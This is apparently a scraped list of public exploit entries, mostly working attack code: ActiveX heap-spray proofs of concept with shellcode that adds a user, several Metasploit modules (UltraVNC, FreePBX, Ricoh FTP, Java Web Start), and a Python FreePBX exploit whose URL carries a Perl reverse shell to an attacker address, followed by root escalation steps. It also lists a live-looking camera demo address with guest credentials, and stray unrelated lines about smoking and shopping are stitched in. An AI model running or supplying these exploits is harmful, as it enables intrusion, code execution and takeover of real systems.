"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
"%u7734%u4734%u4570");

bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<1000;i++){memory[i] = block+shellcode}
</script>
<script defer=defer>
obj.Add(0x76767676,1); //this should result in an address beginning with 0x1d1d[..]
</script>

Source: Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution
  13. TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow

TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow

camera demo http://67.203.184.58:9193/admin/view.cgi?profile=0
username=guest
password=guest

Background:
The mentioned product, when browsing the device web interface, asks to install an ActiveX control to stream video content. It has the following settings:

File version: 1, 1, 52, 18
Product name: UltraMJCam device ActiveX Control
Binary path: C:\WINDOWS\Downloaded Program Files\UltraMJCamX.ocx
ProgID: UltraMJCam.UltraMJCam.1
CLSID: {707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11}
Implements IObjectSafety: yes
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True

Vulnerability:
This ActiveX control exposes the vulnerable OpenFileDlg() method, see typelib:

...
/* DISPID=101 */
/* VT_BSTR [8] */
function OpenFileDlg(
    /* VT_BSTR [8] [in] */ $sFilter
)
{
    /* method OpenFileDlg */
}
...

By invoking this method with an overlong argument it is possible to overflow a buffer. This is because of an insecure WideCharToMultiByte() call inside UltraMJCamX.ocx:

Call stack of main thread
Address   Stack     Procedure / arguments                    Called from            Frame
001279FC  77E6F20B  kernel32.77E637DE                        kernel32.77E6F206      00127A0C
00127A10  0299F958  kernel32.WideCharToMultiByte             UltraMJC.0299F952      00127A0C
00127A14  00000003  CodePage = 3
00127A18  00000000  Options = 0
00127A1C  03835C5C  WideCharStr = "&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
00127A20  FFFFFFFF  WideCharCount = FFFFFFFF (-1.)
00127A24  00127A50  MultiByteStr = 00127A50
00127A28  00007532  MultiByteCount = 7532 (30002.)
00127A2C  00000000  pDefaultChar = NULL
00127A30  00000000  pDefaultCharUsed = NULL
00127A3C  029B11D0  UltraMJC.0299F920                        UltraMJC.029B11CB      00127A38
...

0299F934  8B45 08          mov eax,dword ptr ss:[ebp+8]
0299F937  C600 00          mov byte ptr ds:[eax],0
0299F93A  6A 00            push 0
0299F93C  6A 00            push 0
0299F93E  8B4D 10          mov ecx,dword ptr ss:[ebp+10]
0299F941  51               push ecx
0299F942  8B55 08          mov edx,dword ptr ss:[ebp+8]
0299F945  52               push edx
0299F946  6A FF            push -1
0299F948  8B45 0C          mov eax,dword ptr ss:[ebp+C]
0299F94B  50               push eax
0299F94C  6A 00            push 0
0299F94E  8B4D 14          mov ecx,dword ptr ss:[ebp+14]
0299F951  51               push ecx
0299F952  FF15 20319F02    call dword ptr ds:[<&KERNEL32.WideCharTo>; kernel32.WideCharToMultiByte <------------
...

The result is that critical structures are overwritten (SEH), allowing execution of arbitrary code against the target browser.

As attachment, basic proof of concept code.

<!--
TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control
OpenFileDlg() WideCharToMultiByte Remote Buffer Overflow poc IE7-nodep

camera demo http://67.203.184.58:9193/admin/view.cgi?profile=0
username=guest password=guest

rgod
-->
<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:707ABFC2-1D27-4A10-A6E4-6BE6BDF9FB11' id='obj' />
</object>
<script language='javascript'>
//add user one, user "sun" pass "tzu"
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
"%u7734%u4734%u4570");
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<1888;i++){memory[i] = block+shellcode}
</script>
<script defer=defer>
var x ="";
for (i=0; i<15000; i++){
  x = x + "&";
}
obj.OpenFileDlg(x);
</script>

Source: TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow
  14. Do these guys sell everything? It'll even come to the table if they have customers.
  15. No point spending money on them; starting tomorrow, try not smoking at all and see how long you last.
  16. UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::TcpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release. If a
        malicious server responds to a client connection indicating a minor protocol version
        of 14 or 16, a 32-bit integer is subsequently read from the TCP stream by the client
        and directly provided as the trusted size for further reading from the TCP stream into
        a 1024-byte character array on the stack.
      },
      'Author'         => 'noperand',
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'CVE', '2008-0610' ],
          [ 'OSVDB', '42840' ],
          [ 'BID', '27561' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space' => 500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP SP3', { 'Ret' => 0x00421a61 } ], # vncviewer.exe, 1.0.2
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Feb 6 2008',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])
      ], self.class)
  end

  def on_client_connect(client)
    return if ((p = regenerate_payload(client)) == nil)

    sploit = rand_text_alpha(1100)         # junk, could be more efficient here
    sploit << "\x00\x04\x00\x00"           # value to get around a write
    sploit << rand_text_alpha(12)          # random junk
    sploit << "\xEB\x06" << make_nops(2)   # short relative jump
    sploit << [target.ret].pack('V')       # pop/pop/ret (default is in vncviewer.exe)
    sploit << payload.encoded

=begin
We prepend the initial 12 bytes including the servers' desired protocol version ("RFB 003.016").
- These bytes are read directly by a call to ReadExact() with a size of 12.

...
if (m_minorVersion == 14 || m_minorVersion == 16)
{
    int size;
    ReadExact((char *)&size,sizeof(int));
    char mytext[1024]; //10k
    ReadExact(mytext,size);
    mytext[size]=0;
...

If minor version is 16 or 14, a 32-bit integer follows indicating the size of our data to read.
We then append our data.
=end
    sploit = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x31\x36\x0a" << [sploit.length].pack('N') << sploit

    print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
    client.put(sploit)

    handler(client)
    service.close_client(client)
  end

end

Source: UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow
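The client-side fix for the defect quoted in the module's comment is a bound on the server-supplied length before it is used as a read size. The following is an added example in C; it is not UltraVNC's code and not part of the module above. It assumes an in-memory stream standing in for the TCP socket, and the names `stream_t`, `read_exact`, `handle_server_text`, `demo_benign` and `demo_oversized` are this example's own.

```c
/*
 * Added example: a hardened version of the "minor version 14/16" text handler.
 * The peer-announced length is untrusted and is checked against the
 * destination buffer before any data is read into it. The byte "streams"
 * below are constructed sample input, not captured traffic.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TEXT_BUF_SIZE 1024   /* same size as the original mytext[1024] */

typedef struct {
    const uint8_t *data;
    size_t len;
    size_t pos;
} stream_t;

/* Mirrors ReadExact(): copy exactly n bytes from the stream or fail. */
static int read_exact(stream_t *s, void *out, size_t n) {
    if (s->len - s->pos < n) return -1;
    memcpy(out, s->data + s->pos, n);
    s->pos += n;
    return 0;
}

/*
 * Returns 0 on success, -1 on a short/failed read, -2 when the announced
 * size does not fit (the case the original code never checked).
 * The length is read as uint32_t rather than int so that a negative value
 * cannot slip past the comparison and then be converted to a huge size_t.
 */
int handle_server_text(stream_t *s, char *out, size_t out_size) {
    uint32_t size;
    if (read_exact(s, &size, sizeof size) != 0) return -1;
    /* strictly less: the original writes a NUL at out[size], so size == out_size overflows too */
    if (size >= out_size) return -2;
    if (read_exact(s, out, size) != 0) return -1;
    out[size] = '\0';
    return 0;
}

/* Constructed sample: a well-behaved server announces 5 bytes, then sends "hello". */
int demo_benign(char *out, size_t out_size) {
    uint8_t wire[4 + 5];
    uint32_t n = 5;                      /* native byte order, as the original raw int read */
    memcpy(wire, &n, sizeof n);
    memcpy(wire + 4, "hello", 5);
    stream_t s = { wire, sizeof wire, 0 };
    return handle_server_text(&s, out, out_size);
}

/* Constructed sample: a hostile server announces 0x10000 bytes for a 1024-byte buffer. */
int demo_oversized(char *out, size_t out_size) {
    uint8_t wire[4 + 16];
    uint32_t n = 0x10000;
    memcpy(wire, &n, sizeof n);
    memset(wire + 4, 'A', 16);
    stream_t s = { wire, sizeof wire, 0 };
    return handle_server_text(&s, out, out_size);
}

int main(void) {
    char text[TEXT_BUF_SIZE];
    int rc = demo_benign(text, sizeof text);
    printf("benign:    rc=%d text=\"%s\"\n", rc, rc == 0 ? text : "");
    printf("oversized: rc=%d (rejected before any copy)\n", demo_oversized(text, sizeof text));
    return 0;
}
```

The two details that matter are the unsigned length type and the strict `>=` comparison: with the original `int size`, a check of the form `size < sizeof mytext` would accept a negative value, and allowing `size == 1024` would still place the terminating NUL one byte past the array.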
  17. FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution',
      'Description'    => %q{
          This module exploits FreePBX version 2.10.0,2.9.0 and possibly older.  Due to the
        way callme_page.php handles the 'callmenum' parameter, it is possible to inject code
        to the '$channel' variable in function callme_startcall in order to gain remote code
        execution.  Please note in order to use this module properly, you must know the
        extension number, which can be enumerated or bruteforced, or you may try some of the
        default extensions such as 0 or 200.  Also, the call has to be answered (or go to
        voice).  Tested on both Elastix and FreePBX ISO image installs.
      },
      'Author'         =>
        [
          'muts',
          'Martin Tschirsich'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://www.exploit-db.com/exploits/18649/' ]
        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
        },
      'Targets'        =>
        [
          [ 'Automatic Target', { }]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 20 2012'))

    register_options(
      [
        OptString.new("EXTENSION", [ true, "A range of Local extension numbers", "0-100" ]),
      ], self.class)
  end

  def exploit
    # Check range input
    if datastore['EXTENSION'] =~ /^(\d+)\-(\d+)$/
      min = $1.to_i
      max = $2.to_i
    else
      print_error("Please specify a range for option 'EXTENSION'")
      return
    end

    cmd = Rex::Text.uri_encode(payload.encoded)

    (min..max).each do |e|
      connect
      print_status("#{rhost}:#{rport} - Sending evil request with range #{e.to_s}")
      res = send_request_raw({
        'method'  => 'GET',
        'uri'     => "/recordings/misc/callme_page.php?action=c&callmenum="+e.to_s+"@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20#{cmd}%0D%0A%0D%0A",
        'version' => '1.0',
        'vhost'   => rhost
      })
      handler
      disconnect
    end
  end
end

Source: FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution
  18. Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Ftp

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow",
      'Description'    => %q{
          This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP service.
        By supplying a long string of data to the USER command, it is possible to trigger
        a stack-based buffer overflow, which allows remote code execution under the context
        of the user.  Please note that in order to trigger the vulnerability, the server must
        be configured with a log file name (by default, it's disabled).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Julien Ahrens',  #Discovery, PoC
          'sinn3r'          #Metasploit
        ],
      'References'     =>
        [
          ['OSVDB', '79691'],
          ['URL', 'http://secunia.com/advisories/47912'],
          ['URL', 'http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/']
        ],
      'Payload'        =>
        {
          # Yup, no badchars
          'BadChars' => "\x00",
        },
      'DefaultOptions' =>
        {
          'ExitFunction' => "process",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'Windows XP SP3',
            {
              'Ret'    => 0x77c35459,  #PUSH ESP; RETN (msvcrt.dll)
              'Offset' => 245
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Mar 1 2012",
      'DefaultTarget'  => 0))

    # We're triggering the bug via the USER command, no point to have user/pass
    # as configurable options.
    deregister_options('FTPPASS', 'FTPUSER')
  end

  def check
    connect
    disconnect

    if banner =~ /220 DSC ftpd 1\.0 FTP Server/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    buf = ''
    buf << rand_text_alpha(target['Offset'], payload_badchars)
    buf << [target.ret].pack('V')
    buf << make_nops(20)
    buf << payload.encoded

    print_status("#{rhost}:#{rport} - Sending #{self.name}")
    connect
    send_user(buf)
    handler
    disconnect
  end
end

=begin
0:002> lmv m SR10
start    end        module name
00400000 00410000   SR10       (deferred)
    Image path: C:\Program Files\DC Software\SR10.exe
    Image name: SR10.exe
    Timestamp:        Mon May 19 23:55:32 2008 (483275E4)
    CheckSum:         00000000
    ImageSize:        00010000
    File version:     1.0.0.520
    Product version:  1.0.0.0
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        1.0 App
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Ricoh Co.,Ltd.
    ProductName:      SR-10
    InternalName:     SR-10
    OriginalFilename: SR10.EXE
    ProductVersion:   1, 0, 0, 0
    FileVersion:      1, 0, 0, 520
    PrivateBuild:     1, 0, 0, 520
    SpecialBuild:     1, 0, 0, 520
    FileDescription:  SR-10

Note:
No other DC Software dlls are loaded when SR-10.exe is running, so the most stable
component we can use is msvcrt.dll for now.
=end

Source: Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow
  19. FreePBX 2.10.0 / Elastix 2.2.0 Remote Code Execution Exploit

#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2010
# Author: muts
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt
############################################################
# Discovered by Martin Tschirsich
# http://seclists.org/fulldisclosure/2012/Mar/234
# http://www.exploit-db.com/exploits/18649
############################################################

import urllib

rhost="172.16.254.72"
lhost="172.16.254.223"
lport=443
extension="1000"

# Reverse shell payload
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

urllib.urlopen(url)

# On Elastix, once we have a shell, we can escalate to root:
# root@bt:~# nc -lvp 443
# listening on [any] 443 ...
# connect to [172.16.254.223] from voip [172.16.254.72] 43415
# id
# uid=100(asterisk) gid=101(asterisk)
# sudo nmap --interactive
# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Source: FreePBX 2.10.0 / Elastix 2.2.0 Remote Code Execution Exploit
  20. OneFileCMS - Failure to Restrict URL Access

# Exploit Title: OneFileCMS - Failure to Restrict URL Access
# Date: 12th March 2012
# Author: Abhi M Balakrishnan
# Software Link: https://raw.github.com/rocktronica/OneFileCMS/f265961d0646890c9efe05b93983124abc18c56e/onefilecms.php
# Version: upto 1.1.4
# Tested on: Apache-2.2.17, PHP-5.2.17, MySQL-5.5.9, Windows 6.2
# Vulnerability Status: Fixed on version 1.1.5. Developer was very quick in responding to mails and to fix the issue. Bugfix version released within minutes after the notification. Great work.!!!
# Commit: https://github.com/rocktronica/OneFileCMS/commit/a4e36213d9fe3efccc2f6730d29fd2a05c57594b
# Vulnerability: Failure to Restrict URL Access, since the redirection mechanism can be bypassed easily
# Exploit:
#   Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/
#   Step 2: Access http://example.com/path/admin.php
# PoC Video: http://www.youtube.com/watch?v=0lPz24Z7Q_4

Source: OneFileCMS - Failure to Restrict URL Access
  21. Sun Java Web Start Plugin Command Line Argument Injection (2012)

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Sun Java Web Start Plugin Command Line Argument Injection (2012)',
      'Description'    => %q{
          This module exploits a flaw in the Web Start component of the Sun Java
        Runtime Environment. The arguments passed to Java Web Start are not properly
        validated, allowing injection of arbitrary arguments to the JVM. By utilizing
        the lesser known -J option, an attacker can take advantage of the -XXaltjvm
        option, as discussed previously by Ruben Santamarta. This method allows an
        attacker to execute arbitrary code in the context of an unsuspecting browser
        user.

        In order for this module to work, it must be ran as root on a server that
        does not serve SMB. Additionally, the target host must have the WebClient
        service (WebDAV Mini-Redirector) enabled.
      },
      'License'        => MSF_LICENSE,
      'Author'         => 'jduck', # Bug reported to Oracle by TELUS
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'CVE', '2012-0500' ],
          [ 'OSVDB', '79227' ],
          [ 'BID', '52015' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2012/Feb/251' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html' ]
        ],
      'Platform'       => 'win',
      'Payload'        =>
        {
          'Space'          => 1024,
          'BadChars'       => '',
          'DisableNops'    => true,
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"
        },
      'Targets'        =>
        [
          [ 'Automatic', { } ],
          [ 'Java Runtime on Windows x86',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Feb 14 2012'
      ))

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The daemon port to listen on", 80 ]),
        OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
        OptString.new('UNCPATH', [ false, 'Override the UNC path to use. (Use with an SMB server)' ])
      ], self.class)
  end

  def auto_target(cli, request)
    agent = request.headers['User-Agent']
    ret = nil

    #print_status("Agent: #{agent}")

    # Check for MSIE and/or WebDAV redirector requests
    if agent =~ /(Windows NT (5|6)\.(0|1|2)|MiniRedir\/(5|6)\.(0|1|2))/
      ret = targets[1]
    elsif agent =~ /MSIE (6|7|8)\.0/
      ret = targets[1]
    else
      print_status("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
    end

    ret
  end

  def on_request_uri(cli, request)
    # For this exploit, this does little besides ensures the user agent is a recognized one..
    mytarget = target
    if target.name == 'Automatic'
      mytarget = auto_target(cli, request)
      if (not mytarget)
        send_not_found(cli)
        return
      end
    end

    # Special case to process OPTIONS for /
    if (request.method == 'OPTIONS' and request.uri == '/')
      process_options(cli, request, mytarget)
      return
    end

    # Discard requests for ico files
    if (request.uri =~ /\.ico$/i)
      send_not_found(cli)
      return
    end

    # If there is no subdirectory in the request, we need to redirect.
    if (request.uri == '/') or not (request.uri =~ /\/([^\/]+)\//)
      if (request.uri == '/')
        subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/'
      else
        subdir = request.uri + '/'
      end
      print_status("Request for \"#{request.uri}\" does not contain a sub-directory, redirecting to #{subdir} ...")
      send_redirect(cli, subdir)
      return
    else
      share_name = $1
    end

    # dispatch WebDAV requests based on method first
    case request.method
    when 'OPTIONS'
      process_options(cli, request, mytarget)
    when 'PROPFIND'
      process_propfind(cli, request, mytarget)
    when 'GET'
      process_get(cli, request, mytarget, share_name)
    when 'PUT'
      print_status("Sending 404 for PUT #{request.uri} ...")
      send_not_found(cli)
    else
      print_error("Unexpected request method encountered: #{request.method}")
    end
  end

  #
  # GET requests
  #
  def process_get(cli, request, target, share_name)
    print_status("Responding to \"GET #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}")

    # dispatch based on extension
    if (request.uri =~ /\.dll$/i)
      #
      # DLL requests sent by IE and the WebDav Mini-Redirector
      #
      print_status("Sending DLL to #{cli.peerhost}:#{cli.peerport}...")

      # Re-generate the payload
      return if ((p = regenerate_payload(cli)) == nil)

      # Generate a DLL based on the payload
      dll_data = generate_payload_dll({ :code => p.encoded })

      # Send it
      send_response(cli, dll_data, { 'Content-Type' => 'application/octet-stream' })

    elsif (request.uri =~ /\.jnlp$/i)
      #
      # Send the jnlp document
      #

      # Prepare the UNC path...
      if (datastore['UNCPATH'])
        unc = datastore['UNCPATH'].dup
      else
        my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
        unc = "\\\\" + my_host + "\\" + share_name
      end

      # NOTE: we ensure there's only a single backslash here since it will get escaped
      if unc[0,2] == "\\\\"
        unc.slice!(0, 1)
      end

      http_agent = Rex::Text.rand_text_alpha(8+rand(8))

      jnlp_data = <<-EOS
<?xml version="1.0" encoding="UTF-8"?>
<jnlp version="1">
  <information>
    <title>#{Rex::Text.rand_text_alpha(rand(10)+10)}</title>
    <vendor>#{Rex::Text.rand_text_alpha(rand(10)+10)}</vendor>
    <description>#{Rex::Text.rand_text_alpha(rand(10)+10)}</description>
  </information>
  <resources>
    <java version="1.3+" initial-heap-size='512m" -J-XXaltjvm=#{unc} "' />
  </resources>
  <resources><java java-vm-args='-Dhttp.agent=#{http_agent}"' /></resources>
</jnlp>
      EOS

      print_status("Sending JNLP to #{cli.peerhost}:#{cli.peerport}...")
      send_response(cli, jnlp_data, { 'Content-Type' => 'application/x-java-jnlp-file' })

    else
      print_status("Sending redirect to the JNLP file to #{cli.peerhost}:#{cli.peerport}")
      jnlp_name = Rex::Text.rand_text_alpha(8 + rand(8))
      jnlp_path = get_resource()
      if jnlp_path[-1,1] != '/'
        jnlp_path << '/'
      end
      jnlp_path << request.uri.split('/')[-1] << '/'
      jnlp_path << jnlp_name << ".jnlp"
      send_redirect(cli, jnlp_path, '')
    end
  end

  #
  # OPTIONS requests sent by the WebDav Mini-Redirector
  #
  def process_options(cli, request, target)
    print_status("Responding to WebDAV \"OPTIONS #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}")
    headers = {
      #'DASL'   => '<DAV:sql>',
      #'DAV'    => '1, 2',
      'Allow'  => 'OPTIONS, GET, PROPFIND',
      'Public' => 'OPTIONS, GET, PROPFIND'
    }
    send_response(cli, '', headers)
  end

  #
  # PROPFIND requests sent by the WebDav Mini-Redirector
  #
  def process_propfind(cli, request, target)
    path = request.uri
    print_status("Received WebDAV \"PROPFIND #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}")
    body = ''

    if (path =~ /\.dll$/i)
      # Response for the DLL
      print_status("Sending DLL multistatus for #{path} ...")
      #<lp1:getcontentlength>45056</lp1:getcontentlength>
      body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype/>
<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>
<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>
<lp1:getetag>"39e0132-b000-43c6e5f8d2f80"</lp1:getetag>
<lp2:executable>F</lp2:executable>
<D:lockdiscovery/>
<D:getcontenttype>application/octet-stream</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
|
    elsif (path =~ /\/$/) or (not path.sub('/', '').index('/'))
      # Response for anything else (generally just /)
      print_status("Sending directory multistatus for #{path} ...")
      body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
